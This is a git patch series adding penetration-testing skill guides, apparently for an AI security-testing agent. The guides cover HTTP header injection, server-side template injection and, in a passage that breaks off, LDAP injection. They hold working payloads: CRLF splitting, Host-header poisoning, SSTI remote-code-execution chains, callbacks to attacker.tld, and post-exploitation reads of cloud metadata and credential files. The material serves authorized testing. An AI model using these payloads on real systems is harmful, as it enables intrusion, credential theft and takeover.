From 56ba243952bb9e015e595047e997e3d8407879f3 Mon Sep 17 00:00:00 2001 From: Modark Date: Sun, 3 May 2026 17:06:22 -0700 Subject: [PATCH 1/3] add header-injection and ssti vulnerability skills MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Two new skills under strix/skills/vulnerabilities/ filling real gaps in coverage: - header_injection.md — CRLF / response splitting / smuggling, cache poisoning, Host-header confusion, cookie tossing, X-Forwarded-* spoofing, Content-Type / encoding tricks, header-driven XSS and open redirects, HTTP/2 frame confusion. - ssti.md — engine fingerprinting (Jinja / Twig / Velocity / Freemarker / SpEL / ERB / EJS / Pug / doT), per-language gadget chains, sandbox escape patterns, RCE primitives, post-exploitation. Re-authored from the original .jinja contributions (deprecated format) to match the current skill template (frontmatter + Attack Surface / HVT / Reconnaissance / Key Vulnerabilities / Bypass / Methodology / Validation / False Positives / Impact / Pro Tips / Summary). Several inaccurate payloads from the original (Smarty {system()}, Thymeleaf *{...} in the universal probe table, "Cyrillic" overlong UTF-8 framing, Set-Cookie XSS framing) corrected during the port. --- .../vulnerabilities/header_injection.md | 210 ++++++++++++++ strix/skills/vulnerabilities/ssti.md | 270 ++++++++++++++++++ 2 files changed, 480 insertions(+) create mode 100644 strix/skills/vulnerabilities/header_injection.md create mode 100644 strix/skills/vulnerabilities/ssti.md diff --git a/strix/skills/vulnerabilities/header_injection.md b/strix/skills/vulnerabilities/header_injection.md new file mode 100644 index 00000000..e05bf663 --- /dev/null +++ b/strix/skills/vulnerabilities/header_injection.md @@ -0,0 +1,210 @@ +--- +name: header-injection +description: HTTP header injection testing covering CRLF / response splitting, cache poisoning, Host-header confusion, cookie fixation, and proxy / forwarding header smuggling +--- + +# HTTP Header Injection + +Header injection turns user input into protocol-level control: response splitting, cache poisoning, session fixation, authentication bypass, and request smuggling all trace back to a server-controlled header value that wasn't normalized. The bug usually lives in middle layers — frameworks that copy a request value into a response header, proxies that trust forwarded headers, caches keyed on something the attacker influences. Treat any user-controlled value that reaches a header as code-execution-equivalent until proven otherwise. + +## Attack Surface + +**Input shapes that reach headers** +- Query/body/path values echoed into `Set-Cookie`, `Location`, `Content-Type`, `Content-Disposition`, `Link`, custom `X-*` +- Request headers re-emitted into responses (Referer, User-Agent, X-Forwarded-*, custom correlation IDs) +- Webhook / callback flows where the server constructs outbound requests using user-supplied URLs (Host, Referer) +- Outbound email headers (To/From/Subject) populated from user input + +**Code patterns that enable injection** +- Direct concatenation of user input into header values without CR/LF stripping +- Frameworks that accept header values as strings and serialize verbatim (no normalization) +- Proxy chains trusting `X-Forwarded-*` / `Forwarded` / `X-Real-IP` set by an upstream that anyone can spoof +- `X-HTTP-Method-Override` and similar method-shaping headers respected past auth layers + +**Transports and parser layers** +- HTTP/1.0, HTTP/1.1, HTTP/2, HTTP/3 each parse framing differently +- CDN / reverse proxy → application server (where each side may disagree on framing) +- Chunked transfer encoding boundaries and multipart/form-data delimiters + +## High-Value Targets + +- Password-reset and account-recovery flows (Host header determines the link sent to the user) +- OAuth / SSO redirect endpoints (`Location`, `redirect_uri` echoes) +- Auth gateways that trust `X-Forwarded-For` / `X-Real-IP` for IP allowlists or rate limits +- CDN / WAF caches (poisoning a public cache with a per-user response) +- Multi-tenant routing keyed on Host or `X-Tenant-Id` +- File-download endpoints (`Content-Disposition` filename derived from user input) +- Outbound notification / email systems where user input lands in the message header + +## Reconnaissance + +### Header Inventory + +- Enumerate every response header that varies with input — flip query / body / cookie values and diff `Set-Cookie`, `Location`, `Content-Type`, `Content-Disposition`, `ETag`, `Vary`, custom `X-*` +- For each varying header, identify the source field (user-controlled vs. server-derived) +- Look for request headers reflected into responses (Referer in error pages, User-Agent in correlation IDs, X-Forwarded-Host echoed back) + +### CR/LF and Whitespace Variants + +- Bare LF (`%0a`), bare CR (`%0d`), CRLF (`%0d%0a`) +- Double encoding (`%250d%250a`) for WAFs that decode once +- Overlong UTF-8 of CR/LF (`%c0%8d`, `%c0%8a`) — invalid per spec but accepted by some parsers +- Unicode line/paragraph separators (`%e2%80%a8` U+2028, `%e2%80%a9` U+2029) — sometimes folded to LF by intermediaries +- Tab (`%09`) — RFC 7230 allows tabs in field values, useful for sneaking past simple `\s+` filters +- Null byte (`%00`) — can truncate the header value in some parsers + +### Parser and Server Fingerprinting + +- `Server`, `Via`, `X-Powered-By`, `X-AspNet-Version`, `X-Served-By`, `CF-Ray`, `X-Amzn-RequestId` reveal the stack +- `Vary`, `Age`, `X-Cache`, `CF-Cache-Status` reveal caching layer and key composition +- Same payload over HTTP/1.1 vs HTTP/2 vs chunked — diff status, headers, body length to map parsing differences +- Compare `Host` and `X-Forwarded-Host` precedence: send both with different values and observe which wins in redirects, links, log entries + +## Key Vulnerabilities + +### CRLF Response Splitting and Smuggling + +Inject `\r\n\r\n` to terminate the current response and prepend a second attacker-controlled response. Cache or downstream proxy may key on the first response and serve the second to other users. + +``` +GET /redirect?to=foo%0d%0aSet-Cookie:%20admin=1%0d%0a%0d%0apoisoned HTTP/1.1 +``` + +Request smuggling is the same primitive at the request layer: inject a header that causes the proxy and backend to disagree on message framing — most commonly conflicting `Content-Length` and `Transfer-Encoding`, or two `Content-Length` headers with different values. Backend reads one request, frontend reads a different one; the leftover bytes become a smuggled request prepended to the next victim's connection. + +### Cache Poisoning + +- **Unkeyed input → keyed response**: input that influences the response body but not the cache key (an `X-Forwarded-Host` echoed in a link, an unkeyed query parameter reflected in HTML) +- **`Vary` manipulation**: inject a `Vary` header to over-fragment the cache (DoS-flavored) or under-fragment it (cross-user serving) +- **`X-Forwarded-Proto` / `X-Forwarded-Host` poisoning**: backend uses these to build canonical URLs in the response; CDN caches the response with attacker-controlled links +- **`Cache-Control` injection**: flip `private` to `public` (or vice versa) to change cache eligibility; inject `max-age=999999` for persistent poisoning, or `max-age=0` / `no-cache` to flush — `Age` is generated by the cache itself and isn't a freshness control, don't bother with it +- **Web cache deception**: trick the cache into storing an authenticated response at a public-looking URL (`/account/profile.css`) by appending a cacheable extension + +### Host Header Confusion + +Backends often trust `Host` (or `X-Forwarded-Host`) when constructing absolute URLs — password reset emails, OAuth `redirect_uri`, canonical link tags. Sending a forged Host produces a reset link pointing at attacker-controlled infrastructure that still carries the victim's reset token. + +``` +POST /password-reset HTTP/1.1 +Host: attacker.tld +``` + +Also test: precedence between `Host` and `X-Forwarded-Host`, IPv6 bracketing (`Host: [::1]:80`), trailing dot (`Host: example.com.`), and port confusion (`Host: example.com:@attacker.tld`). + +### Cookie / Set-Cookie Manipulation + +- Inject `Domain=.example.com` or `Path=/` to widen scope of an attacker-set cookie +- Inject `SameSite=None; Secure` to allow cross-site inclusion +- Inject `Max-Age=999999999` for persistence, or `Max-Age=-1` to nuke the victim's session +- Inject a cookie with the same name as a real session cookie — precedence rules let a same-domain attacker shadow it (cookie tossing) +- Reflected cookie XSS: if a cookie value is later rendered unescaped in HTML, the injection point is the header but the sink is the page + +### Proxy and Forwarding Header Spoofing + +The `X-Forwarded-*` family is informational — there is no protocol guarantee about who set them. Any application that trusts them past the boundary it controls is exploitable. + +- `X-Forwarded-For: 127.0.0.1` to bypass IP allowlists or rate limits keyed on client IP +- `X-Forwarded-Proto: https` to satisfy "HTTPS-only" checks while still using HTTP +- `X-Forwarded-Host: attacker.tld` for the Host-confusion variants above +- `X-Real-IP`, `Client-IP`, `True-Client-IP`, `CF-Connecting-IP`, `Forwarded` (RFC 7239) — same primitive, different header names; spray all of them +- `X-Original-URL` / `X-Rewrite-URL` (IIS, ASP.NET) — server-side URL rewriting after auth check, classic admin-panel auth bypass + +### Content-Type / Encoding Confusion + +- Inject `Content-Type: text/html` into an endpoint that returned JSON; browsers may sniff and render → XSS +- Inject `charset=utf-7` in `Content-Type` for legacy XSS via UTF-7-encoded payloads +- Inject `Content-Disposition: inline` to switch a download into in-page rendering +- Inject `Content-Encoding: gzip` without actually compressing — clients decode-fail and may reveal raw response bytes in error paths +- *Absence* of `X-Content-Type-Options: nosniff` is what enables the sniffing attacks above; the header is a hardening control, not an attack surface — but if a server sets it inconsistently across endpoints, target the ones that don't + +### XSS via Response Headers + +- `Location: javascript:alert(1)` if redirect target is reflected unescaped (browsers usually block, but some legacy clients and Electron-style hosts don't) +- `Location: data:text/html,` — same caveat +- `Refresh: 0; url=javascript:alert(1)` — the legacy `Refresh` header is a JavaScript-free meta-refresh equivalent +- Reflected request header XSS: `Referer` echoed into a custom error page, `User-Agent` echoed into a debug header — combine CRLF injection with a body-injection sink + +### Open Redirect via Headers + +- `Location` is the obvious one +- `Refresh: 0; url=https://attacker.tld` — bypasses some `Location`-only filters +- `Link: ; rel="canonical"` — usually informational but consumed by SEO tooling and some clients +- `X-Accel-Redirect: /internal/file` (Nginx) — if user input reaches this, internal-only files become accessible + +### HTTP/2 Pseudo-Header and Frame Confusion + +- HTTP/2 splits headers into pseudo-headers (`:method`, `:path`, `:authority`, `:scheme`) and regular fields. Servers downgrading to HTTP/1.1 sometimes mishandle pseudo-header values, enabling smuggling across the H2 → H1 boundary. +- HTTP/2 lowercases header names; an upstream H1 filter that's case-sensitive may miss a lowercase variant that the H2 backend then accepts. +- HEADERS / CONTINUATION frame splitting: payload spans frames, intermediaries differ on whether they reassemble before applying filters. + +## Bypass Techniques + +**Encoding** +- URL-encode (`%0d%0a`) and double-encode (`%250d%250a`) for WAFs that decode the wrong number of times +- Mix encodings within one payload: `%0d%0A`, `%0D\n`, alternating case +- Newline-equivalent Unicode: U+2028 / U+2029 (sometimes folded to LF), overlong UTF-8 of CR/LF + +**Header normalization edges** +- Leading / trailing whitespace and tabs in header names and values +- Header folding (obs-fold per RFC 7230 — formally obsolete, but some parsers still accept continuation lines starting with whitespace) +- Duplicate headers — RFC says join with `,`; in practice servers pick first, last, or differ from the proxy in front of them + +**Method and method-override** +- `X-HTTP-Method-Override: PUT` (and `X-Method-Override`, `X-HTTP-Method`) to reach state-changing handlers when the framework consults the override before applying method-based authorization +- Effective from server-side or non-browser clients (curl, internal tooling, server-to-server proxies); from a browser the header is non-safelisted and triggers a CORS preflight, so it isn't a CSRF primitive on its own + +**Header name games** +- Case mangling for filters that key off exact casing +- Null byte truncation in header name (`X-Forwarded-For\x00Evil`) on parsers that stop at NUL + +## Testing Methodology + +1. **Inventory varying headers** — enumerate every response header whose value moves with input +2. **Probe CR/LF normalization** — inject `%0d%0a` (and the encoding variants) into each varying header source; observe whether the second line lands as a real header +3. **Test Host / X-Forwarded-Host** — submit a password-reset or any link-generating flow with attacker-controlled Host; confirm the link in the response or follow-up email +4. **Probe forwarding headers** — spoof `X-Forwarded-For`, `X-Real-IP`, `True-Client-IP`, `CF-Connecting-IP` against IP-restricted endpoints (admin, rate-limited) +5. **Test cache key / response content split** — find inputs that change the body but not the cache key; confirm a second request from a different session sees the poisoned response +6. **Test method override** — `X-HTTP-Method-Override` paired with state-changing endpoints reachable via POST or GET +7. **Test request smuggling pairs** — conflicting `Content-Length` and `Transfer-Encoding`, two `Content-Length` headers, malformed chunked encoding, against any frontend → backend pair +8. **Cross-protocol** — replay payloads over HTTP/1.1 and HTTP/2; diff behavior + +## Validation + +1. Show two distinct users (or sessions) receiving content keyed on attacker-supplied header — proves cache poisoning +2. Capture a password-reset / OAuth link pointing at attacker-controlled host — proves Host injection +3. Demonstrate the same endpoint returning different auth decisions with and without a forged forwarding header +4. For response splitting: show a downstream cache or proxy serving the injected second response to an unrelated request +5. For request smuggling: show one victim request seeing data from a different request appended (not just timing or single-shot anomaly) +6. All findings should produce a durable artifact (cached response, sent email, log entry, session change) — transient anomalies are not validation + +## False Positives + +- Headers that vary by input but are correctly keyed in the cache (intentional personalization, Vary set correctly) +- `X-Forwarded-*` reflected back but only used for logging — not a security boundary, may not be exploitable +- Browsers blocking `Location: javascript:` or `Location: data:` — capability exists in the protocol but most modern browsers refuse to navigate +- CRLF appearing in response headers but stripped by an outer proxy before reaching any client or cache +- Request smuggling indicators that turn out to be normal pipelining or keep-alive behavior + +## Impact + +- Cross-user cache poisoning (defacement, XSS, account takeover via cached auth response) +- Account takeover via Host-confused password-reset / OAuth flows +- Auth bypass on endpoints trusting forwarding headers +- Session fixation and cookie tossing leading to account hijack +- Open redirect for phishing / OAuth `redirect_uri` abuse +- Request smuggling — one victim's request reads another victim's response, including auth headers and cookies +- WAF / detection bypass via header-name and encoding tricks + +## Pro Tips + +1. The fastest win is usually Host / `X-Forwarded-Host` in a password-reset or OAuth flow — try first, costs one request +2. For cache poisoning, find the *unkeyed* input first (header that influences body but not cache key); the rest follows +3. `X-HTTP-Method-Override` is high-yield against backends that route on it before checking method-based auth — most useful from server-side / non-browser callers (it triggers CORS preflight in a browser, so not a CSRF primitive) +4. Smuggling lives at the boundary — identify the proxy → backend pair (CDN → origin, ingress → service) and target the framing disagreement +5. `X-Original-URL` / `X-Rewrite-URL` against IIS / ASP.NET admin endpoints is still a high-yield bypass +6. Before claiming a CRLF win, verify the second line landed as a real header in the cache or downstream consumer — many servers strip CRLF silently +7. Outbound email flows are a separate but related surface — user input flowing into SMTP headers (To, Cc, Subject, Reply-To) is its own injection class with the same root cause + +## Summary + +Header injection is fundamentally a normalization failure: somewhere on the request → response path, user input reached a header value without CR/LF stripping or proper escaping. The impact tiers up from open redirect to cache poisoning to request smuggling depending on which downstream component trusts the resulting header. Audit every header whose value moves with input, and treat every `X-Forwarded-*` / Host trust as a security boundary that needs explicit justification. diff --git a/strix/skills/vulnerabilities/ssti.md b/strix/skills/vulnerabilities/ssti.md new file mode 100644 index 00000000..fdc66c05 --- /dev/null +++ b/strix/skills/vulnerabilities/ssti.md @@ -0,0 +1,270 @@ +--- +name: ssti +description: Server-side template injection across Jinja / Mako / Velocity / Freemarker / Thymeleaf / Twig / Handlebars / EJS / ERB with engine fingerprinting, sandbox escape, and RCE gadget chains +--- + +# Server-Side Template Injection + +SSTI happens when user input reaches a template engine as syntax instead of as data — `{{user_input}}` rendered through Jinja, `${user_input}` through Velocity / SpEL, `<%= user_input %>` through ERB / EJS. The eventual impact is almost always RCE because template engines are designed to evaluate expressions and most leak access to the host language's runtime (Python builtins, Java reflection, JavaScript prototypes). The discovery cost is low — a `{{7*7}}` probe — but the gadget chain to RCE differs sharply per engine, so engine fingerprinting is the load-bearing step. + +## Attack Surface + +**Input shapes that reach the renderer** +- Form fields, query / path / header values, cookies, JSON / GraphQL variables +- Filenames and file metadata processed by document / report templates +- Email subject / body / template-selector fields +- Theme / customization endpoints (CSS / HTML generation, dashboard widgets, webhook payload templates) +- Markdown / WYSIWYG content rendered through a templating layer downstream + +**Code patterns that enable injection** +- User input concatenated into a template string before `render(template_str)` instead of passed as a context variable to `render(template_obj, context)` +- "Template editor" features for tenants / admins where the *template itself* is user-controllable +- `format()` / `sprintf()` / printf-style chains with user-controlled format string downstream of a template +- YAML / TOML / JSON values whose strings are later evaluated through a template + +**Engines in scope** +- Python: Jinja2, Mako, Django (limited) +- Java: Velocity, Freemarker, Thymeleaf (with SpEL), JSP EL +- JS / Node: Handlebars, Nunjucks, EJS, Pug, Marko, Dust +- Ruby: ERB, Haml, Slim +- PHP: Twig, Smarty, Blade +- .NET: Razor, RazorEngine + +## High-Value Targets + +- Email rendering pipelines (subject / body / "from" templates) +- PDF / report generators (server-side render → headless browser) +- CMS theme and plugin editors +- Webhook and notification payload templates +- API response formatters that interpolate strings (pagination labels, error messages, custom field renders) +- Admin / tenant template editors — explicit "edit your template" features + +## Reconnaissance + +### Injection Points + +- Submit a benign string and grep responses (HTML, JSON, emails, PDFs) for verbatim reflection +- Anywhere user input ends up in a value that's clearly being templated (preview panes, "your message will look like…" panels) is high-signal +- Check error pages — many engines leak template syntax in stack traces + +### Engine Fingerprinting + +The classic differential probe — most engines evaluate exactly one of these, identifying themselves: + +| Probe | Renders to | Engine family | +|---|---|---| +| `{{7*7}}` | `49` | Jinja2 / Twig / Nunjucks | +| `{{7*'7'}}` | `7777777` (Jinja) or `49` (Twig) | distinguishes Jinja from Twig | +| `${7*7}` | `49` | Velocity / Freemarker / SpEL / JSP EL / Thymeleaf | +| `<%= 7*7 %>` | `49` | ERB / EJS | +| `#{7*7}` | `49` | Pug / some Ruby contexts | +| `{{= 7*7 }}` | `49` | doT.js | + +For Thymeleaf specifically, the `*{...}` selection-expression form also evaluates but only inside a `th:object` scope; `${...}` is the universal probe. + +Secondary signals: error message text (engine name in stack trace), comment-syntax differential (`{# #}` Jinja vs `<%# %>` ERB vs `{* *}` Smarty), filter syntax (`|` vs `:` vs space). + +### Blind Probes + +When output isn't reflected: + +- **Time-based**: payload that triggers a sleep on the host language (`{{''.__class__.__mro__[1].__subclasses__()[](...)}}` for Jinja, `${T(java.lang.Thread).sleep(5000)}` for SpEL, `<%= sleep(5) %>` for ERB) +- **OAST**: payload that performs a DNS lookup or HTTP fetch to attacker infrastructure (`{{request.application.__globals__.__builtins__.__import__('socket').gethostbyname('x.attacker.tld')}}`) +- **Length / ETag diff**: payload whose evaluation changes the body length, even if the value isn't directly visible + +## Key Vulnerabilities + +### Jinja2 / Mako (Python) + +The classic Python class walk — every object exposes its method-resolution-order, which leads to `object`, which exposes every subclass loaded in the interpreter, which includes things like `subprocess.Popen`: + +```jinja +{{''.__class__.__mro__[1].__subclasses__()}} +``` + +Locate a useful subclass and call it. Common gadgets when builtins are reachable through globals: + +```jinja +{{cycler.__init__.__globals__.os.popen('id').read()}} +{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} +{{config.__class__.__init__.__globals__['os'].popen('id').read()}} +``` + +Sandbox bypass: even with `SandboxedEnvironment`, attribute-lookup tricks (`|attr('__class__')`) and `request.environ` access can re-introduce reachability. Check whether the app exposes `request`, `config`, `cycler`, or any framework global into the template context. + +### Velocity / Freemarker / Thymeleaf (Java) + +SpEL (Spring Expression Language) — used by Thymeleaf and various Spring components — reaches `Runtime` via the `T()` type operator. Note that `Runtime.exec()` returns a `java.lang.Process` object whose `toString()` is `"Process[pid=...]"`, **not** the command's stdout. To get reflected output you need to consume the process's `InputStream`: + +```spel +${T(java.lang.Runtime).getRuntime().exec('id')} +${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('id').getInputStream()).useDelimiter('\\A').next()} +${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())} +``` + +The first form confirms execution (rendered Process object proves the call ran); the Scanner form is universally available; the `IOUtils` form is shorter when Apache Commons IO is on the classpath. For blind contexts, validate via OAST or sleep. + +Freemarker's `freemarker.template.utility.Execute` is the canonical RCE gadget when not denylisted, and unlike `Runtime.exec` it returns the command output as a string directly: + +```freemarker +<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") } +``` + +Velocity gadgets typically don't have `$Runtime` in context — that's not a standard Velocity built-in. The portable approach is string-class reflection from any reachable object: + +```velocity +#set($s = "") +#set($r = $s.class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(null)) +$r.exec("id") +``` + +This requires the default `UberspectImpl` (Velocity 1.x and Velocity 2.x without `SecureUberspector`); same `Process.toString()` caveat applies — capture stdout via `Scanner` or `BufferedReader` if reflected output is needed. If the application uses Velocity Tools, `$class` (a `ClassTool`) is often in scope and shortens the chain considerably. + +Thymeleaf SSTI requires control over the *template source*, not just over a model variable bound into the template — normal Spring MVC binding renders `${userInput}` as a value, never re-evaluated as SpEL. The exploitable surface is `templateEngine.process(userControlledString, ctx)`, admin-editable email / notification templates, and template fragments composed from user input. When that surface exists, the same SpEL payloads apply: + +```html +
+
+``` + +Confusing this with normal model binding produces false positives — confirm the template source itself is attacker-influenced before flagging. + +### Smarty / Twig / Blade (PHP) + +Twig sandbox bypasses are version-specific. The canonical historical gadget (Twig 1.x) registered `system` as an undefined-filter callback, then invoked it through the filter pipeline: + +```twig +{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id")}} +``` + +This was patched — in Twig 2.x / 3.x `_self` returns the template name as a string and no longer exposes `.env`. Modern bypasses depend on which extensions are loaded and the active sandbox policy; consult Twig's published security advisories for the current state and probe with the version-specific gadgets (filter/function abuse, reflection on `_context` in some configs). + +Smarty `{php}...{/php}` was the historical RCE primitive; deprecated in Smarty 3 and removed in 4. On modern Smarty, the surface is static-method invocation and template-object reflection — `{$smarty.template_object->smarty->...}` walks back to the Smarty engine, and direct static calls on whitelisted classes (e.g. `{Smarty_Internal_Write_File::writeFile(...)}` on misconfigured installs) reach the filesystem. Probe both before assuming Smarty is hardened. + +Blade (Laravel) compiles templates to PHP on first render and caches the compiled output, so the dangerous paths are runtime: `Blade::render($userControlledString, ...)`, `Blade::compileString(...)` with user input, or any reachable `@php ... @endphp` block whose body is composed from user input — all three are direct RCE. + +### ERB / Haml (Ruby) + +Direct Ruby evaluation — backticks are the shortest path that *reflects* command output: + +```erb +<%= `id` %> +<%= IO.popen('id').read %> +<% require 'open3'; out, _ = Open3.capture2('id'); %><%= out %> +<%= system('id') %> +``` + +The first three render the command's stdout into the response. `system('id')` returns `true`/`false` and prints the command output to the *server's* stdout, not the HTTP body — useful for confirming execution succeeded but not for capturing output. Pair with OAST or a side-effect (file write, DNS lookup) when the response doesn't reflect anything. + +Haml is the same risk surface in different syntax. `instance_eval` / `class_eval` chained off any reachable object becomes RCE. + +### Handlebars / Nunjucks / EJS (JavaScript) + +EJS evaluates inline JavaScript: + +```ejs +<%= require('child_process').execSync('id').toString() %> +``` + +Nunjucks via constructor walk on reachable objects: + +```nunjucks +{{range.constructor("return require('child_process').execSync('id')")()}} +``` + +Handlebars itself is harder (default helpers are restricted), but custom helpers that pass arguments to `eval`, `Function`, or `child_process` re-open the surface. Also probe for prototype pollution as an SSTI amplifier — once `Object.prototype` is polluted, downstream template logic may execute attacker-controlled code paths. + +## Bypass Techniques + +**Sandbox escape — generic patterns** +- **Attribute lookup instead of direct access**: `{{x.__class__}}` blocked? try `{{x|attr('__class__')}}` +- **Class walk to recover deleted builtins**: `{{[].__class__.__base__.__subclasses__()}}` enumerates everything loaded +- **String constructor games**: `'__import__'.__class__` etc., when literal `__import__` is filtered +- **Filter / function aliasing**: same callable reachable via different names — find one not on the denylist +- **Implicit conversion**: object whose `__str__` / `toString` triggers code, coerced via concatenation + +**Filter and parser evasion** +- Whitespace / case variants in keywords: `{{7 *7}}`, `{{ 7*7 }}`, `{{7*7}}` +- String concatenation to assemble denylisted identifiers: `{{('__cl'+'ass__')}}`, `{{request|attr('__cl'~'ass__')}}` — splits a token without a comment (Jinja's lexer doesn't recognize `{#` inside expression mode, so SQL-style `/**/` token splitting doesn't work here) +- Encoding layering: payload arrives URL-encoded, JSON-decoded, then template-rendered — pick the encoding that survives the filter but is decoded before render +- Operator precedence games: `((7)*(7))`, `7**7`, `7+0+7` +- Null byte truncation: `{{x%00.evil}}` — terminates payload for some pre-template filters but not the template parser +- Unicode normalization: smart quotes, fullwidth digits — bypasses naive denylists, normalizes back during render + +**Polyglot and chained evaluation** +- Multi-engine pipelines: output of engine A feeds engine B — craft payload valid in both, or escape A and inject for B +- Markdown / RST embedded in a template — Markdown parser may strip your payload, but a code block survives and reaches the template +- Format string → template: printf-style format applied before template render; payload that's inert as a format string but live as a template + +## RCE Primitives + +**Direct command execution by language** +- Python: `os.system`, `os.popen`, `subprocess.run`, `subprocess.Popen`, `__import__('os').system` +- Java: `Runtime.getRuntime().exec`, `ProcessBuilder`, `freemarker.template.utility.Execute` +- Ruby: backticks, `system`, `exec`, `Open3.capture2`, `IO.popen`, `%x{}` +- JavaScript / Node: `require('child_process').execSync` / `exec` / `spawn`; `require.main.require(...)` when nested module loading is needed (`process.mainModule` is the older form, deprecated since Node 14 but still present in most CJS contexts) +- PHP: `system`, `passthru`, `exec`, `shell_exec`, backticks, `popen` + +**Indirect / second-stage** +- File write to webroot → trigger via subsequent HTTP request (when shell exec is blocked but file write isn't) +- Define a function / macro inline that runs on next render +- Unsafe deserialization gadget invoked through template (Java `ObjectInputStream`, Python `pickle`, PHP `unserialize`) +- DNS / HTTP exfiltration when shell exec produces no observable output + +## Post-Exploitation + +- Environment dump (`env`, `os.environ`, `System.getenv`) — credentials, cloud metadata tokens, internal URLs +- Cloud metadata fetch (`http://169.254.169.254/latest/meta-data/`, `http://metadata.google.internal/`) — IAM tokens +- Read filesystem secrets (`.env`, `.aws/credentials`, `~/.ssh/`, `/proc/self/environ`) +- Lateral via internal HTTP — service mesh endpoints reachable from the rendering host +- Persistence: cron, scheduled task, systemd unit, `~/.ssh/authorized_keys`, web shell in webroot + +## Testing Methodology + +1. **Find templated input** — anywhere a server clearly templated user input (preview panes, email previews, dynamic dashboards, custom fields) +2. **Fingerprint the engine** — run the differential probe table; confirm with a second probe +3. **Confirm evaluation, not reflection** — `{{7*7}}` rendering as `49` (not `{{7*7}}` literally) is the line between XSS and SSTI +4. **Probe sandbox state** — try `{{self}}`, `{{config}}`, `{{request}}`, `{{cycler}}` (Jinja); `${self}`, `${T(java.lang.Class)}` (Java); `<%= self %>` (Ruby) — reachable globals are the gadget pool +5. **Enumerate gadgets** — class walk for Python / Node, reflection for Java, `require` chain for Node +6. **Reach RCE** — pick the shortest gadget chain to a shell-equivalent primitive +7. **Validate side effects** — DNS callback, file write, sleep — anything observable that proves execution + +## Validation + +1. Show evaluated output for two distinct expressions (`{{7*7}}` → `49` and `{{7*8}}` → `56`) to rule out coincidence or hard-coded reflection +2. Demonstrate object access (`{{self.__class__}}`, `${T(java.lang.Class)}`) confirming runtime reflection +3. Demonstrate side effect — DNS lookup to attacker-controlled domain, sleep with measurable delta, file written to a known path +4. For RCE: command output captured in response, file written, or OAST callback containing command output +5. Provide minimal payload — the simplest expression that reaches RCE, not the kitchen-sink polyglot + +## False Positives + +- Template syntax reflected literally (`{{7*7}}` rendered as `{{7*7}}`) — that's XSS-shaped, not SSTI +- Sandboxed environments where reflection succeeds but reachable objects expose nothing useful (Jinja `SandboxedEnvironment` with no `request` / `config` in context) +- Client-side template engines (Vue, Angular, Mustache running in the browser) — that's client-side template injection, different impact (XSS, not RCE) +- Markdown / static-site generators that template at build time only, with no user input reaching the build +- Engines where the output is HTML-escaped before display, masking evaluation as XSS-like reflection — verify with a non-HTML probe (`{{7*7}}` numeric) + +## Impact + +- Remote code execution on the rendering host (the default outcome — almost every engine leaks a path to it) +- Server-side data exfiltration via gadget chains (filesystem, env vars, internal HTTP) +- Cloud credential theft via metadata service access from the compromised host +- Lateral movement into internal services reachable from the renderer +- Persistent backdoor via web shell or service-account key planting +- Build / supply-chain compromise when the templated content is a build artifact + +## Pro Tips + +1. Always confirm with a second math probe (`{{7*8}}`) before celebrating — single-shot reflection of `49` could be coincidental +2. Engine fingerprint first, gadget chain second — wrong-engine payloads are wasted requests and noise in WAF logs +3. For Jinja, the highest-yield reachable global varies by framework (`request` in Flask, `config` always present, `cycler` in older Jinja); spray all three before walking subclasses +4. SpEL is everywhere in Spring stacks — Thymeleaf, Spring Security expression language, Spring Cloud Gateway routes; the same payload shape (`${T(java.lang.Runtime)...}`) works across all of them +5. EJS / Nunjucks are common in Express / Koa apps — `require('child_process').execSync('id')` if `require` is in scope (EJS), or escape via `range.constructor("return require('child_process')...")()` for Nunjucks; `process.mainModule.require(...)` is the older form, deprecated since Node 14 +6. Sandbox escapes are usually one indirection away — `attr` lookup, constructor traversal, MRO walk; most "sandboxed" environments still reach the runtime if you go through attribute access instead of direct reference +7. Output not reflected? Time-based and OAST work as well as for SQLi — `${T(java.lang.Thread).sleep(5000)}` for SpEL, `{{cycler.__init__.__globals__.__import__('time').sleep(5)}}` (or the `request.application.__globals__.__builtins__` walk in Flask) for Jinja — bare `__import__` is not in the template namespace and will raise `UndefinedError` +8. Email previews and PDF generators are gold mines — they're often built on the same engine as the public site but exposed to less-validated input flows + +## Summary + +SSTI is fundamentally different from XSS at the same syntactic location: the payload runs on the server, in the host language, with whatever objects the engine exposes. Engine fingerprinting via the math-probe table narrows the search space immediately. From there it's a race between the sandbox's denylist and the language's reflection capability — and the language usually wins. Treat any user input that reaches a template renderer (not a templated context variable) as RCE-shaped until proven sandboxed. From 6356f2af5dcef69526dd090a7436c166e1382441 Mon Sep 17 00:00:00 2001 From: MoDarK-MK Date: Sat, 12 Sep 2026 15:20:49 +0330 Subject: [PATCH 2/3] feat: add LDAP injection vulnerability skill Covers search-then-bind authentication bypass, blind boolean extraction, DN/RDN injection, and second-order injection against Active Directory, OpenLDAP, and eDirectory. --- .../skills/vulnerabilities/ldap_injection.md | 198 ++++++++++++++++++ 1 file changed, 198 insertions(+) create mode 100644 strix/skills/vulnerabilities/ldap_injection.md diff --git a/strix/skills/vulnerabilities/ldap_injection.md b/strix/skills/vulnerabilities/ldap_injection.md new file mode 100644 index 00000000..c8644b1b --- /dev/null +++ b/strix/skills/vulnerabilities/ldap_injection.md @@ -0,0 +1,198 @@ +--- +name: ldap-injection +description: LDAP injection testing covering search filter manipulation, authentication bypass, blind boolean extraction, and DN injection against Active Directory and OpenLDAP +--- + +# LDAP Injection + +LDAP injection exploits unsanitized user input concatenated into LDAP search filters, distinguished names (DNs), or directory-modification operations. Unlike SQL, LDAP has no native parameterized-query API in most language bindings, so string concatenation is the default pattern in application code — making this class common wherever an app talks to Active Directory, OpenLDAP, or Novell eDirectory for auth, user lookup, or group resolution. Treat every value interpolated into a filter string (RFC 4515) or a DN as untrusted until proven otherwise. + +## Attack Surface + +**Directory Services** +- Active Directory (AD) — dominant in enterprise SSO/auth backends +- OpenLDAP, 389 Directory Server, Novell/NetIQ eDirectory +- Cloud-adjacent: AD LDS, AWS Directory Service, Azure AD DS (LDAP interface) + +**Integration Paths** +- Native bindings: Java JNDI (`DirContext.search`), PHP `ldap_search`/`ldap_bind`, Python `python-ldap`/`ldap3`, .NET 